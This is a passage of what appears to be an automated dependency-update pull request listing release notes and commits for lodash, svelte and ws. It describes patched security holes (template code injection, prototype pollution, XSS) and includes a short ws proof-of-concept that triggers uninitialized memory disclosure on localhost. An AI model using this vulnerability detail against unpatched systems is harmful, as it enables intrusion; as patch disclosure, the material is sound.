\u003ccode\u003ebaseSet\u003c/code\u003e. Calls that previously returned \u003ccode\u003etrue\u003c/code\u003e and deleted the property now return \u003ccode\u003efalse\u003c/code\u003e and leave the target untouched.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ccode\u003e_.template\u003c/code\u003e\u003c/strong\u003e: Fixed code injection via \u003ccode\u003eimports\u003c/code\u003e keys (\u003ca href=\"https://github.com/lodash/lodash/security/advisories/GHSA-r5fr-rjxr-66jc\"\u003eGHSA-r5fr-rjxr-66jc\u003c/a\u003e, CVE-2026-4800, \u003ca href=\"https://github.com/lodash/lodash/commit/879aaa93132d78c2f8d20c60279da9f8b21576d6\"\u003e879aaa9\u003c/a\u003e). Fixes an incomplete patch for CVE-2021-23337. The \u003ccode\u003evariable\u003c/code\u003e option was validated against \u003ccode\u003ereForbiddenIdentifierChars\u003c/code\u003e but \u003ccode\u003eimportsKeys\u003c/code\u003e was left unguarded, allowing code injection via the same \u003ccode\u003eFunction()\u003c/code\u003e constructor sink. \u003ccode\u003eimports\u003c/code\u003e keys containing forbidden identifier characters now throw \u003ccode\u003e\u0026quot;Invalid imports option passed into _.template\u0026quot;\u003c/code\u003e.\u003c/p\u003e\n\u003ch3\u003eDocs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd security notice for \u003ccode\u003e_.template\u003c/code\u003e in threat model and API docs (\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6099\"\u003e#6099\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDocument \u003ccode\u003elower \u0026gt; upper\u003c/code\u003e behavior in \u003ccode\u003e_.random\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6115\"\u003e#6115\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix quotes in \u003ccode\u003e_.compact\u003c/code\u003e jsdoc (\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6090\"\u003e#6090\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ccode\u003elodash.*\u003c/code\u003e modular packages\u003c/h3\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6157\"\u003eDiff\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eWe have also regenerated and published a select number of the \u003ccode\u003elodash.*\u003c/code\u003e modular packages.\u003c/p\u003e\n\u003cp\u003eThese modular packages had fallen out of sync significantly from the minor/patch updates to lodash. Specifically, we have brought the following packages up to parity w/ the latest lodash release because they have had CVEs on them in the past:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.orderby\"\u003elodash.orderby\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.tonumber\"\u003elodash.tonumber\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.trim\"\u003elodash.trim\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.trimend\"\u003elodash.trimend\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.sortedindexby\"\u003elodash.sortedindexby\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.zipobjectdeep\"\u003elodash.zipobjectdeep\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.unset\"\u003elodash.unset\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.omit\"\u003elodash.omit\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.template\"\u003elodash.template\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/cb0b9b9212521c08e3eafe7c8cb0af1b42b6649e\"\u003e\u003ccode\u003ecb0b9b9\u003c/code\u003e\u003c/a\u003e release(patch): bump main to 4.18.1 (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6177\"\u003e#6177\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/75535f57883b7225adb96de1cfc1cd4169cfcb51\"\u003e\u003ccode\u003e75535f5\u003c/code\u003e\u003c/a\u003e chore: prune stale advisory refs (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6170\"\u003e#6170\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/62e91bc6a39c98d85b9ada8c44d40593deaf82a4\"\u003e\u003ccode\u003e62e91bc\u003c/code\u003e\u003c/a\u003e docs: remove n_ Node.js \u0026lt; 6 REPL note from README (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6165\"\u003e#6165\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/59be2de61f8aa9461c7856533b51d31b7d8babc4\"\u003e\u003ccode\u003e59be2de\u003c/code\u003e\u003c/a\u003e release(minor): bump to 4.18.0 (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6161\"\u003e#6161\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/af634573030f979194871da7c68f79420992f53d\"\u003e\u003ccode\u003eaf63457\u003c/code\u003e\u003c/a\u003e fix: broken tests for _.template 879aaa9\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/1073a7693e1727e0cf3641e5f71f75ddcf8de7c0\"\u003e\u003ccode\u003e1073a76\u003c/code\u003e\u003c/a\u003e fix: linting issues\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/879aaa93132d78c2f8d20c60279da9f8b21576d6\"\u003e\u003ccode\u003e879aaa9\u003c/code\u003e\u003c/a\u003e fix: validate imports keys in _.template\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/fe8d32eda854377349a4f922ab7655c8e5df9a0b\"\u003e\u003ccode\u003efe8d32e\u003c/code\u003e\u003c/a\u003e fix: block prototype pollution in baseUnset via constructor/prototype traversal\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/18ba0a32f42fd02117f096b032f89c984173462d\"\u003e\u003ccode\u003e18ba0a3\u003c/code\u003e\u003c/a\u003e refactor(fromPairs): use baseAssignValue for consistent assignment (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6153\"\u003e#6153\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/b8190803d48d60b8c80ad45d39125f32fa618cb2\"\u003e\u003ccode\u003eb819080\u003c/code\u003e\u003c/a\u003e ci: add dist sync validation workflow (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6137\"\u003e#6137\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/lodash/lodash/compare/4.17.21...4.18.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `svelte` from 4.2.19 to 5.55.7\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/sveltejs/svelte/releases\"\u003esvelte's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003esvelte@5.55.7\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efix: prevent XSS on \u003ccode\u003ehydratable\u003c/code\u003e from user contents (\u003ca href=\"https://github.com/sveltejs/svelte/commit/a16ebc67bbcf8f708360195687e1b2719463e1a4\"\u003e\u003ccode\u003ea16ebc67bbcf8f708360195687e1b2719463e1a4\u003c/code\u003e\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003echore: bump devalue (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18219\"\u003e#18219\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: disallow empty attribute names during SSR (\u003ca href=\"https://github.com/sveltejs/svelte/commit/547853e2406a2147ad7fb5ffeba95b01bd9642da\"\u003e\u003ccode\u003e547853e2406a2147ad7fb5ffeba95b01bd9642da\u003c/code\u003e\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: harden regex (\u003ca href=\"https://github.com/sveltejs/svelte/commit/d2375e2ebcab5c88feb5652f1a9d621b8f06b259\"\u003e\u003ccode\u003ed2375e2ebcab5c88feb5652f1a9d621b8f06b259\u003c/code\u003e\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: move Svelte runtime properties to symbols (\u003ca href=\"https://github.com/sveltejs/svelte/commit/e1cbbd96441e82c9eb8a23a2903c0d06d3cda991\"\u003e\u003ccode\u003ee1cbbd96441e82c9eb8a23a2903c0d06d3cda991\u003c/code\u003e\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esvelte@5.55.6\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efix: leave stale promises to wait for a later resolution, instead of rejecting (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18180\"\u003e#18180\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: keep dependencies of \u003ccode\u003e$state.eager/pending\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18218\"\u003e#18218\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: reapply context after transforming error during SSR (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18099\"\u003e#18099\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: don't rebase just-created batches (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18117\"\u003e#18117\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003echore: allow \u003ccode\u003enull\u003c/code\u003e for \u003ccode\u003epending\u003c/code\u003e in typings (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18201\"\u003e#18201\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: flush eager effects in production (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18107\"\u003e#18107\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: rethrow error of failed iterable after calling \u003ccode\u003ereturn()\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18169\"\u003e#18169\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: account for proxified instance when updating \u003ccode\u003ebind:this\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18147\"\u003e#18147\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: ensure scheduled batch is flushed if not obsolete (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18131\"\u003e#18131\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: resolve stale deriveds with latest value (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18167\"\u003e#18167\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003echore: remove unnecessary \u003ccode\u003eincrement_pending\u003c/code\u003e calls (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18183\"\u003e#18183\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: correctly compile component member expressions for SSR (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18192\"\u003e#18192\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: reset \u003ccode\u003esource.updated\u003c/code\u003e stack traces after \u003ccode\u003eflush\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18196\"\u003e#18196\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: replacing async 'blocking' strategy with 'merging' (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18205\"\u003e#18205\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: allow \u003ccode\u003e@debug\u003c/code\u003e tags to reference awaited variables (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18138\"\u003e#18138\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: re-run fallback props if dependencies update (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18146\"\u003e#18146\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: abort running obsolete async branches (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18118\"\u003e#18118\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/sveltejs/svelte/blob/main/packages/svelte/CHANGELOG.md\"\u003esvelte's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e5.55.7\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efix: prevent XSS on \u003ccode\u003ehydratable\u003c/code\u003e from user contents (\u003ca href=\"https://github.com/sveltejs/svelte/commit/a16ebc67bbcf8f708360195687e1b2719463e1a4\"\u003e\u003ccode\u003ea16ebc67bbcf8f708360195687e1b2719463e1a4\u003c/code\u003e\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003echore: bump devalue (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18219\"\u003e#18219\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: disallow empty attribute names during SSR (\u003ca href=\"https://github.com/sveltejs/svelte/commit/547853e2406a2147ad7fb5ffeba95b01bd9642da\"\u003e\u003ccode\u003e547853e2406a2147ad7fb5ffeba95b01bd9642da\u003c/code\u003e\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: harden regex (\u003ca href=\"https://github.com/sveltejs/svelte/commit/d2375e2ebcab5c88feb5652f1a9d621b8f06b259\"\u003e\u003ccode\u003ed2375e2ebcab5c88feb5652f1a9d621b8f06b259\u003c/code\u003e\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: move Svelte runtime properties to symbols (\u003ca href=\"https://github.com/sveltejs/svelte/commit/e1cbbd96441e82c9eb8a23a2903c0d06d3cda991\"\u003e\u003ccode\u003ee1cbbd96441e82c9eb8a23a2903c0d06d3cda991\u003c/code\u003e\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.55.6\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efix: leave stale promises to wait for a later resolution, instead of rejecting (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18180\"\u003e#18180\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: keep dependencies of \u003ccode\u003e$state.eager/pending\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18218\"\u003e#18218\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: reapply context after transforming error during SSR (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18099\"\u003e#18099\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: don't rebase just-created batches (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18117\"\u003e#18117\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003echore: allow \u003ccode\u003enull\u003c/code\u003e for \u003ccode\u003epending\u003c/code\u003e in typings (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18201\"\u003e#18201\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: flush eager effects in production (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18107\"\u003e#18107\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: rethrow error of failed iterable after calling \u003ccode\u003ereturn()\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18169\"\u003e#18169\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: account for proxified instance when updating \u003ccode\u003ebind:this\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18147\"\u003e#18147\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: ensure scheduled batch is flushed if not obsolete (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18131\"\u003e#18131\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: resolve stale deriveds with latest value (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18167\"\u003e#18167\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003echore: remove unnecessary \u003ccode\u003eincrement_pending\u003c/code\u003e calls (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18183\"\u003e#18183\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: correctly compile component member expressions for SSR (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18192\"\u003e#18192\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: reset \u003ccode\u003esource.updated\u003c/code\u003e stack traces after \u003ccode\u003eflush\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18196\"\u003e#18196\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: replacing async 'blocking' strategy with 'merging' (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18205\"\u003e#18205\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: allow \u003ccode\u003e@debug\u003c/code\u003e tags to reference awaited variables (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18138\"\u003e#18138\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: re-run fallback props if dependencies update (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18146\"\u003e#18146\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/4d8f99a2709e3c02e48d8bc6c77458f4ba49d0e3\"\u003e\u003ccode\u003e4d8f99a\u003c/code\u003e\u003c/a\u003e Version Packages (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18220\"\u003e#18220\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/05523088173e10af0753877af6936088de924833\"\u003e\u003ccode\u003e0552308\u003c/code\u003e\u003c/a\u003e chore: bump devalue (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18219\"\u003e#18219\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/e1cbbd96441e82c9eb8a23a2903c0d06d3cda991\"\u003e\u003ccode\u003ee1cbbd9\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/a16ebc67bbcf8f708360195687e1b2719463e1a4\"\u003e\u003ccode\u003ea16ebc6\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/d2375e2ebcab5c88feb5652f1a9d621b8f06b259\"\u003e\u003ccode\u003ed2375e2\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/547853e2406a2147ad7fb5ffeba95b01bd9642da\"\u003e\u003ccode\u003e547853e\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/55f9c85c09d625c3dd80c71ce7542f57386fafb4\"\u003e\u003ccode\u003e55f9c85\u003c/code\u003e\u003c/a\u003e Version Packages (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18158\"\u003e#18158\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/a10e8e47a5946623a60a1e36b9023c23926eae87\"\u003e\u003ccode\u003ea10e8e4\u003c/code\u003e\u003c/a\u003e fix: keep dependencies of \u003ccode\u003e$state.eager\u003c/code\u003e/\u003ccode\u003epending\u003c/code\u003e (alternative approach) (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/1\"\u003e#1\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/ef4b97dfabfd7a23b27933e18f7393587c343d66\"\u003e\u003ccode\u003eef4b97d\u003c/code\u003e\u003c/a\u003e fix: duplicated \u0026quot;of\u0026quot; in events.js comment (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18217\"\u003e#18217\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/5122936edb3c14e9a602e579727479b49cbd3239\"\u003e\u003ccode\u003e5122936\u003c/code\u003e\u003c/a\u003e fix: treat batches as a linked list (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18205\"\u003e#18205\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/sveltejs/svelte/commits/svelte@5.55.7/packages/svelte\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for svelte since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `ws` from 8.17.1 to 8.20.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/websockets/ws/releases\"\u003ews's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e8.20.1\u003c/h2\u003e\n\u003ch1\u003eBug fixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFixed an uninitialized memory disclosure issue in \u003ccode\u003ewebsocket.close()\u003c/code\u003e\n(c0327ec1).\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eProviding a \u003ccode\u003eTypedArray\u003c/code\u003e (e.g. \u003ccode\u003eFloat32Array\u003c/code\u003e) as the \u003ccode\u003ereason\u003c/code\u003e argument for\n\u003ccode\u003ewebsocket.close()\u003c/code\u003e, rather than the supported string or \u003ccode\u003eBuffer\u003c/code\u003e types, caused\nuninitialized memory to be disclosed to the remote peer.\u003c/p\u003e\n\u003cpre lang=\"js\"\u003e\u003ccode\u003eimport { deepStrictEqual } from 'node:assert';\r\nimport { WebSocket, WebSocketServer } from 'ws';\r\n\u003cp\u003econst wss = new WebSocketServer(\n{ port: 0, skipUTF8Validation: true },\nfunction () {\nconst { port } = wss.address();\nconst ws = new WebSocket(\u003ccode\u003ews://localhost:${port}\u003c/code\u003e, {\nskipUTF8Validation: true\n});\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003ews.on('close', function (code, reason) {\r\n  deepStrictEqual(reason, Buffer.alloc(80));\r\n});\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003e}\n);\u003c/p\u003e\n\u003cp\u003ewss.on('connection', function (ws) {\nws.close(1000, new Float32Array(20));\n});\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cp\u003eThe issue was privately reported by \u003ca href=\"https://github.com/ChALkeR\"\u003eNikita Skovoroda\u003c/a\u003e.\u003c/p\u003e\n\u003ch2\u003e8.20.0\u003c/h2\u003e\n\u003ch1\u003eFeatures\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eAdded exports for the \u003ccode\u003ePerMessageDeflate\u003c/code\u003e class and utilities for the\n\u003ccode\u003eSec-WebSocket-Extensions\u003c/code\u003e and \u003ccode\u003eSec-WebSocket-Protocol\u003c/code\u003e headers (d3503c1f).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.19.0\u003c/h2\u003e\n\u003ch1\u003eFeatures\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eAdded the \u003ccode\u003ecloseTimeout\u003c/code\u003e option (\u003ca href=\"https://redirect.github.com/websockets/ws/issues/2308\"\u003e#2308\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eBug fixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eHandled a forthcoming breaking change in Node.js core (19984854).\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/5d9b316230ea931532a6671cc450f18c11edd02f\"\u003e\u003ccode\u003e5d9b316\u003c/code\u003e\u003c/a\u003e [dist] 8.20.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/c0327ec15a54d701eb6ccefaa8bef328cfc03086\"\u003e\u003ccode\u003ec0327ec\u003c/code\u003e\u003c/a\u003e [security] Fix uninitialized memory disclosure in \u003ccode\u003ewebsocket.close()\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/ce2a3d62437995a47e6056d485a33d21b6a8f867\"\u003e\u003ccode\u003ece2a3d6\u003c/code\u003e\u003c/a\u003e [ci] Test on node 26\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/58e45b872bb0f35a3edd553c27e105300a4f5bd0\"\u003e\u003ccode\u003e58e45b8\u003c/code\u003e\u003c/a\u003e [ci] Do not test on node 25\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/5f26c245231a4b018479a9269e8c3da4773fe42f\"\u003e\u003ccode\u003e5f26c24\u003c/code\u003e\u003c/a\u003e [ci] Run the lint step on node 24\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/843925544e2f4cffe445e0179947f56d6c5b608f\"\u003e\u003ccode\u003e8439255\u003c/code\u003e\u003c/a\u003e [dist] 8.20.0\u003c/li\u003e\n\u003cli\u003e\u003ca 